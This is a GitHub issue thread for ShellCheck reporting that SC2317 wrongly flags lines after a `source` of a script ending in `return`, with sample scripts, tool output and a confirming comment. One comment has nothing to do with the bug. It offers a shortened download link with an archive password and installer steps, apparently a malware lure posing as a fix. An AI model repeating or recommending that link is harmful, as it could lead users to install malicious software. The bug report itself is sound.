### ISSUE TITLE
SC2317 false positives on scripts run with `source` and having `return` as its last command

### ISSUE THREAD

**Issue by pteroismw** [koalaman/shellcheck#3046]
#### For bugs
- Rule Id (if any, e.g. SC1000):
- My shellcheck version (`shellcheck --version` or "online"):
- [x] The rule's wiki page does not already cover this (e.g. https://shellcheck.net/wiki/SC2086)
- [ ] I tried on https://www.shellcheck.net/ and verified that this is still a problem on the latest commit

#### For new checks and feature suggestions
- [ ] https://www.shellcheck.net/ (i.e. the latest commit) currently gives no useful warnings about this
- [ ] I searched through https://github.com/koalaman/shellcheck/issues and didn't find anything related

#### Here's a snippet or screenshot that shows the problem:
**main.sh**
```bash
#!/bin/bash
# shellcheck source=./sourced.sh
source sourced.sh
echo "this comes after 'source sourced.sh'"
echo "the next line"
```

**sourced.sh**
```bash
return
```

#### Here's what shellcheck currently says:
```
> shellcheck -x main.sh

In main.sh line 4:
echo "this comes after 'source sourced.sh'"
^-- SC2317 (info): Command appears to be unreachable. Check usage (or ignore if invoked indirectly).

In main.sh line 5:
echo "the next line"
^------------------^ SC2317 (info): Command appears to be unreachable. Check usage (or ignore if invoked indirectly).

For more information:
  https://www.shellcheck.net/wiki/SC2317 -- Command appears to be unreachable...
```

All lines following `source ...` are reported as unreachable.

#### Here's what I wanted or expected to see:

The highlighted commands are reachable and should not be flagged.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by mmjo** [comment]
I can confirm this issue.
Without the return statement in the sourced script, but instead ending with e.g. : (the colon statement),
the lines are not marked unreachable.
This seems to be a regression, unfortunately I don't speak Haskell.
